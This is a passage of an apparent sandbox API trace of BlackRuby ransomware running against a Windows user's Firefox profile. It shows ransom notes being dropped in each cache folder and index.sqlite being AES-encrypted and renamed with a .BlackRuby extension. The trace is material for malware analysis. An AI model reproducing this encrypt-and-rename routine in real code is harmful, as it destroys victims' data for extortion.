lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.391] GetLastError () returned 0x12 [0049.391] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.391] SetErrorMode (uMode=0x0) returned 0x1 [0049.391] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\e\\69\\885eed01"), fInfoLevelId=0x0, lpFileInformation=0x1b9e534 | out: lpFileInformation=0x1b9e534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88d66da0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x88d66da0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x88dff320, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x10d22)) returned 1 [0049.391] GetLastError () returned 0x12 [0049.391] SetErrorMode (uMode=0x0) returned 0x1 [0049.391] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\69\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\e\\69\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.391] GetLastError () returned 0x0 [0049.392] GetFileType (hFile=0x184) returned 0x1 [0049.392] GetFileType (hFile=0x184) returned 0x1 [0049.392] WriteFile (in: hFile=0x184, lpBuffer=0x1bba2fc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1bba2fc*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.392] GetLastError () returned 0x0 [0049.393] CloseHandle (hObject=0x184) returned 1 [0049.393] GetLastError () returned 0x0 [0049.393] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\69\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.393] GetLastError () returned 0x0 [0049.393] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\B3\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.393] GetLastError () returned 0x0 [0049.393] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.393] SetErrorMode (uMode=0x0) returned 0x1 [0049.393] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\B3\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.393] GetLastError () returned 0x12 [0049.393] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.393] SetErrorMode (uMode=0x0) returned 0x1 [0049.394] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\B3\\F1A1Ad01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\e\\b3\\f1a1ad01"), fInfoLevelId=0x0, lpFileInformation=0x1bbd8ec | out: lpFileInformation=0x1bbd8ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4afdeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4afdeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4afdeb0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xa037)) returned 1 [0049.394] GetLastError () returned 0x12 [0049.394] SetErrorMode (uMode=0x0) returned 0x1 [0049.394] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\B3\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\e\\b3\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.394] GetLastError () returned 0x0 [0049.394] GetFileType (hFile=0x184) returned 0x1 [0049.394] GetFileType (hFile=0x184) returned 0x1 [0049.394] WriteFile (in: hFile=0x184, lpBuffer=0x1bd95b4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1bd95b4*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.395] GetLastError () returned 0x0 [0049.395] CloseHandle (hObject=0x184) returned 1 [0049.395] GetLastError () returned 0x0 [0049.395] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\B3\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.395] GetLastError () returned 0x0 [0049.395] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.396] GetLastError () returned 0x0 [0049.396] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.396] SetErrorMode (uMode=0x0) returned 0x1 [0049.396] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.396] GetLastError () returned 0x12 [0049.396] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.396] SetErrorMode (uMode=0x0) returned 0x1 [0049.396] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\23\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.396] GetLastError () returned 0x12 [0049.396] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.396] SetErrorMode (uMode=0x0) returned 0x1 [0049.396] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\23\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.397] GetLastError () returned 0x12 [0049.397] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.397] SetErrorMode (uMode=0x0) returned 0x1 [0049.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\f\\23\\7e0fed01"), fInfoLevelId=0x0, lpFileInformation=0x1bde728 | out: lpFileInformation=0x1bde728*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88d66da0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x88d66da0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x88db3060, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xf888)) returned 1 [0049.397] GetLastError () returned 0x12 [0049.397] SetErrorMode (uMode=0x0) returned 0x1 [0049.397] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\23\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\f\\23\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.397] GetLastError () returned 0x0 [0049.397] GetFileType (hFile=0x184) returned 0x1 [0049.397] GetFileType (hFile=0x184) returned 0x1 [0049.397] WriteFile (in: hFile=0x184, lpBuffer=0x1bfa3f0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1bfa3f0*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.398] GetLastError () returned 0x0 [0049.398] CloseHandle (hObject=0x184) returned 1 [0049.398] GetLastError () returned 0x0 [0049.398] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\23\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.399] GetLastError () returned 0x0 [0049.399] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\23\\91913d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\f\\23\\91913d01"), fInfoLevelId=0x0, lpFileInformation=0x1bfc154 | out: lpFileInformation=0x1bfc154*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4b702d0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4b702d0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4b702d0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x5224)) returned 1 [0049.399] GetLastError () returned 0x0 [0049.399] SetErrorMode (uMode=0x0) returned 0x1 [0049.399] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\23\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\f\\23\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.399] GetLastError () returned 0x5 [0049.400] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\23\\E6681d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\f\\23\\e6681d01"), fInfoLevelId=0x0, lpFileInformation=0x1c1a0ec | out: lpFileInformation=0x1c1a0ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc1ef47b0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc1ef47b0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc236b0f0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x153dc)) returned 1 [0049.400] GetLastError () returned 0x5 [0049.400] SetErrorMode (uMode=0x0) returned 0x1 [0049.400] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\23\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\f\\23\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.400] GetLastError () returned 0x5 [0049.401] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\F0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.403] GetLastError () returned 0x5 [0049.403] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.403] SetErrorMode (uMode=0x0) returned 0x1 [0049.403] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\F0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.403] GetLastError () returned 0x12 [0049.403] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.403] SetErrorMode (uMode=0x0) returned 0x1 [0049.403] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\f\\f0\\ecb2dd01"), fInfoLevelId=0x0, lpFileInformation=0x1c39910 | out: lpFileInformation=0x1c39910*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x72dc74f0, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x72dc74f0, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x72e5fa70, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0xa80f)) returned 1 [0049.403] GetLastError () returned 0x12 [0049.403] SetErrorMode (uMode=0x0) returned 0x1 [0049.404] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\F0\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\f\\f0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.404] GetLastError () returned 0x0 [0049.404] GetFileType (hFile=0x184) returned 0x1 [0049.404] GetFileType (hFile=0x184) returned 0x1 [0049.404] WriteFile (in: hFile=0x184, lpBuffer=0x1c555d8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c555d8*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.405] GetLastError () returned 0x0 [0049.405] CloseHandle (hObject=0x184) returned 1 [0049.405] GetLastError () returned 0x0 [0049.405] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\F\\F0\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.406] GetLastError () returned 0x0 [0049.406] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.406] GetLastError () returned 0x0 [0049.406] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.406] SetErrorMode (uMode=0x0) returned 0x1 [0049.406] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.406] GetLastError () returned 0x12 [0049.406] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.407] SetErrorMode (uMode=0x0) returned 0x1 [0049.407] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\offlinecache\\index.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1c58ce4 | out: lpFileInformation=0x1c58ce4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9509a880, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x9509a880, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xa2fafe80, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x40000)) returned 1 [0049.407] GetLastError () returned 0x12 [0049.407] SetErrorMode (uMode=0x0) returned 0x1 [0049.407] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\offlinecache\\index.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.407] GetLastError () returned 0x0 [0049.407] GetFileType (hFile=0x184) returned 0x1 [0049.407] GetFileType (hFile=0x184) returned 0x1 [0049.407] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eb54 | out: lpFileSizeHigh=0x18eb54*=0x0) returned 0x40000 [0049.407] GetLastError () returned 0x0 [0049.423] CloseHandle (hObject=0x184) returned 1 [0049.423] GetLastError () returned 0x0 [0049.425] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\offlinecache\\index.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18eb64 | out: lpFileInformation=0x18eb64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9509a880, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x9509a880, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xa2fafe80, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x40000)) returned 1 [0049.425] GetLastError () returned 0x0 [0049.425] SetErrorMode (uMode=0x0) returned 0x1 [0049.425] CryptAcquireContextW (in: phProv=0x18eac4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eac4*=0x37c790) returned 1 [0049.426] GetLastError () returned 0x0 [0049.451] CryptImportKey (in: hProv=0x37c790, pbData=0x1cb5028, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eaa0 | out: phKey=0x18eaa0*=0x360ae0) returned 1 [0049.451] GetLastError () returned 0x0 [0049.451] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.451] GetLastError () returned 0x0 [0049.463] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.463] GetLastError () returned 0x0 [0049.463] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ea5c | out: phKey=0x18ea5c*=0x360fa0) returned 1 [0049.463] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.463] GetLastError () returned 0x0 [0049.463] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1ce2074*=0x1, dwFlags=0x0) returned 1 [0049.463] GetLastError () returned 0x0 [0049.463] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1ce2040, dwFlags=0x0) returned 1 [0049.463] GetLastError () returned 0x0 [0049.464] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2dc7000*, pdwDataLen=0x18eaec*=0x40100, dwBufLen=0x40100 | out: pbData=0x2dc7000*, pdwDataLen=0x18eaec*=0x40100) returned 1 [0049.466] GetLastError () returned 0x0 [0049.468] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce20d0*, pdwDataLen=0x18eb04*=0x10, dwBufLen=0x10 | out: pbData=0x1ce20d0*, pdwDataLen=0x18eb04*=0x10) returned 1 [0049.468] GetLastError () returned 0x0 [0049.468] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ce2100*, pdwDataLen=0x18eb0c*=0x0, dwBufLen=0x10 | out: pbData=0x1ce2100*, pdwDataLen=0x18eb0c*=0x10) returned 1 [0049.468] GetLastError () returned 0x0 [0049.473] CryptDestroyKey (hKey=0x360ae0) returned 1 [0049.473] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.473] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.473] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite", nBufferLength=0x105, lpBuffer=0x18e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite", lpFilePart=0x0) returned 0x62 [0049.473] GetLastError () returned 0x0 [0049.473] SetErrorMode (uMode=0x1) returned 0x0 [0049.473] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\offlinecache\\index.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.475] GetLastError () returned 0xb7 [0049.475] GetFileType (hFile=0x184) returned 0x1 [0049.475] SetErrorMode (uMode=0x0) returned 0x1 [0049.475] GetFileType (hFile=0x184) returned 0x1 [0049.476] WriteFile (in: hFile=0x184, lpBuffer=0x2ec7460*, nNumberOfBytesToWrite=0x40110, lpNumberOfBytesWritten=0x18eb08, lpOverlapped=0x0 | out: lpBuffer=0x2ec7460*, lpNumberOfBytesWritten=0x18eb08*=0x40110, lpOverlapped=0x0) returned 1 [0049.480] GetLastError () returned 0xb7 [0049.480] CloseHandle (hObject=0x184) returned 1 [0049.482] GetLastError () returned 0xb7 [0049.482] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite", lpFilePart=0x0) returned 0x62 [0049.482] GetLastError () returned 0xb7 [0049.482] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\Encrypted_f6RWbCknSIJK4CgRbUi69KjheOZag277RebUEeREgm.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\Encrypted_f6RWbCknSIJK4CgRbUi69KjheOZag277RebUEeREgm.BlackRuby", lpFilePart=0x0) returned 0x94 [0049.482] GetLastError () returned 0xb7 [0049.482] SetErrorMode (uMode=0x1) returned 0x0 [0049.482] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\offlinecache\\index.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18eb4c | out: lpFileInformation=0x18eb4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9509a880, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x9509a880, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x25b1bae0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x40110)) returned 1 [0049.482] GetLastError () returned 0xb7 [0049.483] SetErrorMode (uMode=0x0) returned 0x1 [0049.483] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\offlinecache\\index.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\Encrypted_f6RWbCknSIJK4CgRbUi69KjheOZag277RebUEeREgm.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\offlinecache\\encrypted_f6rwbcknsijk4cgrbui69kjheozag277rebueeregm.blackruby")) returned 1 [0049.483] GetLastError () returned 0xb7 [0049.483] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6e [0049.483] GetLastError () returned 0xb7 [0049.483] SetErrorMode (uMode=0x1) returned 0x0 [0049.483] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\offlinecache\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.498] GetLastError () returned 0x0 [0049.498] GetFileType (hFile=0x184) returned 0x1 [0049.498] SetErrorMode (uMode=0x0) returned 0x1 [0049.498] GetFileType (hFile=0x184) returned 0x1 [0049.498] WriteFile (in: hFile=0x184, lpBuffer=0x1cfd53c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb10, lpOverlapped=0x0 | out: lpBuffer=0x1cfd53c*, lpNumberOfBytesWritten=0x18eb10*=0x18da, lpOverlapped=0x0) returned 1 [0049.500] GetLastError () returned 0x0 [0049.500] CloseHandle (hObject=0x184) returned 1 [0049.500] GetLastError () returned 0x0 [0049.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6e [0049.500] GetLastError () returned 0x0 [0049.500] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\OfflineCache\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.500] GetLastError () returned 0x0 [0049.500] GetFullPathNameW (in: 